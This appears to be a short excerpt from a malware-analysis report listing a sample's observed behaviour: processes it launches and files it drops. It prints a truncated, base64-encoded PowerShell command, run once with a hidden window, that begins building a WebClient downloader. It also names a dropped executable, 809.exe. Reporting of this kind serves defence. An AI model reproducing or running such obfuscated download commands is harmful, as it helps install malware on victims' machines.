Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1005769.cvr
- %HOMEPATH%\809.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...' (with hidden window)